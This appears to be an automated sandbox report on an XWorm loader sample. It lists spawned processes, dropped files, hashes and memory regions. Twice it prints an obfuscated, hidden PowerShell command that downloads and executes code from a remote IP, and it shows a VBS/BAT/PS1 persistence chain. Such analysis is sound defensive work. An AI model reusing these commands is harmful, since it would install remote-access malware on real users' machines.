"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe"
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
"C:\Users\Admin\AppData\Local\Temp\NEW.EXE"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_XWorm.V5.2.zip\XWorm.V5.2.rar"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xexxru.bat" "
C:\Windows\SysWOW64\cmd.exe
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5='IEX(NEW-OBJECT NET.W';$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE='EBCLIENT).DOWNLO';[BYTE[]];$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598='13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752(''http://146.103.11.88:222/8X.jpg'')'.REPLACE('13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752','ADSTRING');[BYTE[]];IEX($25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5+$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE+$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5='IEX(NEW-OBJECT NET.W';$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE='EBCLIENT).DOWNLO';[BYTE[]];$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598='13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752(''http://146.103.11.88:222/8X.jpg'')'.REPLACE('13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752','ADSTRING');[BYTE[]];IEX($25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5+$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE+$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598)
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | dc7c40e556b30acdb1ca3e96bd31e1e8 |
| SHA1 | d55685a0c7be37a2770c960af43254580467573d |
| SHA256 | 1ca3f8c46710f2f696ae1fa7c2f47920d9cb6465a23f3ac7296c0c819ded24dd |
| SHA512 | 639a408b29def2e971f68839749efdfe62fb4b11642db4c0759322ebe97891cfc1d944fc01e1e1e5769fbe43d5e75c87623910d2660af40e942b1d489f0fb7cf |
memory/4168-690-0x000001EFEEEE0000-0x000001EFEFB18000-memory.dmp
memory/4168-691-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll
| MD5 | 2f1a50031dcf5c87d92e8b2491fdcea6 |
| SHA1 | 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f |
| SHA256 | 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed |
| SHA512 | 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8 |
memory/4168-699-0x000001EFF3010000-0x000001EFF3020000-memory.dmp
memory/4168-700-0x000001EFF3020000-0x000001EFF3C0C000-memory.dmp
memory/4168-701-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
| MD5 | 3facc93eb70a073f208f90955fb055cb |
| SHA1 | 8f04cf5b9c9164f82b7e77034eee62396f6c5bf0 |
| SHA256 | 608c73065d03ab7da0a0b8c8c3db3e073b2403a8d0249b9d684286f58e52dead |
| SHA512 | 269fb263dd7a2f383c2442a43e98435c4ee0767eab55c77ce5ff2e169089739e746f70208baaac2e4459076596a6afbf3fc8960d1ce9b8f46e91f7e462bd649c |
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
| MD5 | e2b473487e4b8429711aef51a68f56a4 |
| SHA1 | 7d3119b07b951c68d17ae12e0764072a8c3d961b |
| SHA256 | c2ced27749e5bf8d9d01de0feb58ab40818c3f4339dd9c5898b2b6168be2ce44 |
| SHA512 | ead5c2977428cd44eb98f48511dbce8e64f5544fc3f8cc3e706f24f5903eeca92207a07c18f089e4451f8ed5264c28b6e1e088437100cc6c7274432275d18dd1 |
memory/2992-743-0x0000000000450000-0x0000000000458000-memory.dmp
memory/2952-742-0x0000000000EB0000-0x0000000000EC6000-memory.dmp
memory/2952-744-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/2992-746-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/2952-747-0x0000000005930000-0x0000000005940000-memory.dmp
memory/2952-748-0x0000000005940000-0x00000000059DC000-memory.dmp
memory/2952-754-0x0000000074B90000-0x0000000075341000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4C0E.tmp.bat
| MD5 | 5878b0128d7a339aed2d629762a05718 |
| SHA1 | e1d606091a8af2ae55f392f1eafe07e85183ac7e |
| SHA256 | 83b44dff6ff54fff2f43ab3eb814f8dca2723af638c85c77c553a9cc5e2af040 |
| SHA512 | 9add89dab52e2b570a715d79e59f308196394ed472f757c2efa125a87350a59d47708d6624c89d4cec8b6e77ca031809bbd957701ed56afa0df5f43cdb609d3d |
C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe
| MD5 | e6a20535b636d6402164a8e2d871ef6d |
| SHA1 | 981cb1fd9361ca58f8985104e00132d1836a8736 |
| SHA256 | b461c985b53de4f6921d83925b3c2a62de3bbc5b8f9c02eecd27926f0197fae2 |
| SHA512 | 35856a0268ed9d17b1570d5392833ed168c8515d73fac9f150cf63cc1aea61c096aa2e6b3c8e091a1058ba062f9333f6767e323a37dfb6f4fa7e508a2a138a30 |
memory/5116-776-0x0000000000030000-0x0000000000050000-memory.dmp
memory/5116-777-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
memory/4104-781-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/5116-782-0x00007FFBE0B90000-0x00007FFBE1652000-memory.dmp
memory/4104-783-0x0000000002E30000-0x0000000002E40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ConsoleApp1.exe.log
| MD5 | 1294de804ea5400409324a82fdc7ec59 |
| SHA1 | 9a39506bc6cadf99c1f2129265b610c69d1518f7 |
| SHA256 | 494398ec6108c68573c366c96aae23d35e7f9bdbb440a4aab96e86fcad5871d0 |
| SHA512 | 033905cc5b4d0c0ffab2138da47e3223765146fa751c9f84b199284b653a04874c32a23aae577d2e06ce6c6b34fec62331b5fc928e3baf68dc53263ecdfa10c1 |
memory/2420-806-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/2420-807-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/2992-808-0x0000000074B90000-0x0000000075341000-memory.dmp
memory/3820-832-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/3820-833-0x0000000075230000-0x00000000759E1000-memory.dmp
memory/4104-834-0x0000000075230000-0x00000000759E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6501760878eab949512641f92edce0a3 |
| SHA1 | 3a1c324d8fea7ebeece5803e9ac36a80d4f37976 |
| SHA256 | fedb3da8eed8530af16948231af63e90c0f06ee6e48f20ebca269758e6f3d682 |
| SHA512 | e734921dc9abff2c8343ef80407f56c8b80b91ce4f3723529e795350d80b3e0ca185b2dd21f57feaf8e0722fae6a5ec30888b7add80305871beb662c0f4ce11a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0edbeeefdcb21bd1a62e46d06e648ea2 |
| SHA1 | 66483e1aee5b0da7712ddc0becb913010da93862 |
| SHA256 | c50d4742f7b3597255b30710e481c8928fea8e1a147d0cf09f05e4c388258137 |
| SHA512 | 194aef0812759c83e8bad4c0affdb9e01fadc796315511b698df1b029aa4596a55353592078a26f7b5e2c592b03ddb5f63fddebf280a4ee1f13ffd458d401f9a |
memory/4104-856-0x0000000002E30000-0x0000000002E40000-memory.dmp
memory/4104-869-0x0000000006230000-0x00000000067D6000-memory.dmp
memory/4104-870-0x0000000005D30000-0x0000000005D96000-memory.dmp
memory/4972-880-0x00007FFBE0AE0000-0x00007FFBE15A2000-memory.dmp
memory/4972-883-0x00000226004E0000-0x00000226004F0000-memory.dmp
memory/4972-884-0x00007FFBE0AE0000-0x00007FFBE15A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | d2d55f8057f8b03c94a81f3839b348b9 |
| SHA1 | 37c399584539734ff679e3c66309498c8b2dd4d9 |
| SHA256 | 6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c |
| SHA512 | 7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 24f393ce9e4272995bf97f9c5994d826 |
| SHA1 | ba40a6c32e34cd16b3f5515be2cc6bc6d0f72e8f |
| SHA256 | ee1abc75c48f6614e30a34f942ffdfaf0a20182d8e0b380f10b57888cd0e7f54 |
| SHA512 | 7351f18c5ecdebab97a0bcbf75dc94aeb67c1cfbcf3382d518c25f63374de11374f422a215d07ae50c7c96f99c6cb8d82d421cd7d6c381e70773f068fe430eeb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | b38fbbd0b5c8e8b4452b33d6f85df7dc |
| SHA1 | 386ba241790252df01a6a028b3238de2f995a559 |
| SHA256 | b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd |
| SHA512 | 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | d404b61450122b2ad393c3ece0597317 |
| SHA1 | d18809185baef8ec6bbbaca300a2fdb4b76a1f56 |
| SHA256 | 03551254e2231ecd9c7ee816b488ecbde5d899009cd9abbe44351d98fbf2f5fb |
| SHA512 | cb1a2867cc53733dc72cd294d1b549fa571a041d72de0fa4d7d9195bcac9f8245c2095e6a6f1ece0e55279fa26337cdcc82d4c269e1dd186cbbd2b974e2d6a70 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3ca9f1a5314df6fa1f0fc35cec299c5b |
| SHA1 | 6a506081c8c2c80fca360eadd2049d3c4f207e7a |
| SHA256 | a59fc2ce7b9904c79c06dcef5fe870237ee647f0ff23e987fae82596bc2e91f5 |
| SHA512 | 214853143bd8a4a356b9c4fc0ef612a306e2c58c7ab7d869423fb10350259c8773a733b2e19c91d006dd42440c593d25631282cdad126982c91f94e43f58ffc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ececd44456a852def7379d7da7adfa4d |
| SHA1 | f2bbf52ae65c8479d884e0a0af71709e4d351923 |
| SHA256 | e95be3be02389fbb8769cc551c83c0e8602a5e67ec1b6f87e3d8edda17a1626e |
| SHA512 | fd24d6735f212aad5bd59cab20e17533725481ae5b429736f0cbb71948b5462882967b62b4f651be4b64989116bbbb3edc82ba8451fea45b788b985ce4ca76d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | bc9faa8bb6aae687766b2db2e055a494 |
| SHA1 | 34b2395d1b6908afcd60f92cdd8e7153939191e4 |
| SHA256 | 4a725d21a3c98f0b9c5763b0a0796818d341579817af762448e1be522bc574ed |
| SHA512 | 621386935230595c3a00b9c53ea25daa78c2823d32085e22363dc438150f1cb6b3d50be5c58665886fac2286ae63bf1f62c8803cb38a0cac201c82ee2db975c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009
| MD5 | 3cd0f2f60ab620c7be0c2c3dbf2cda97 |
| SHA1 | 47fad82bfa9a32d578c0c84aed2840c55bd27bfb |
| SHA256 | 29a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b |
| SHA512 | ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5b606f5686a1733d5dcee5d8025f18ec |
| SHA1 | 618b2a442a7a717d6aa2aef905f317df55ad2c27 |
| SHA256 | cce615095a0572052cfc325888a03b4606f0bb40e18e82ec3c79540894473d52 |
| SHA512 | 2a307500d5de4a456c719a0407821195b5a2aa0496ad4cd70cb1adecaf1684c3a8e77000eff8e7d33408e8856885c44d9229f41ea1bbf82c67d0fccf55b15d4a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c78f3755f348b5560861886cade17b31 |
| SHA1 | 8b401ae3db9a3480ca7bfe7563865d297ed29ceb |
| SHA256 | 32bbe8890d2cfa5fa080297f655ca349d9013db5baf8c765df9de60d9d359d3c |
| SHA512 | 9be5048cb6dc0c6ed8392a9178f1fc158cfb7b14a05a1f750992eb2719e872ce6d91aa6c1c84a13cb81e887ec3f88ba317b82399d154ba720daddf0a5b13da99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | be215b18cd4c23bbbaaed7c9fbe28f66 |
| SHA1 | 67db5194c07f689c84b89491844e1b068b0169af |
| SHA256 | f1d3e49e17ba921084bb00ccc94b62e7b37a8caff10fe5146cbfc52eaf4de49d |
| SHA512 | e48286894763db19dd66c82571cadb6e969aad782bfbbdfb4f7d82592e4e519a29c8a3d8c12ef2d5c174289ae80f7764590b9186d80d511883ddee74dcfc9ecd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 61c5c04d9ce0d6c486522dfd597add4e |
| SHA1 | 53aaac3a3a78018e024df19d174496bfc21d74b4 |
| SHA256 | abbdf8c19949e36bdbdc60d0313a9228c55c07024c59b0d0b945230f8cc18523 |
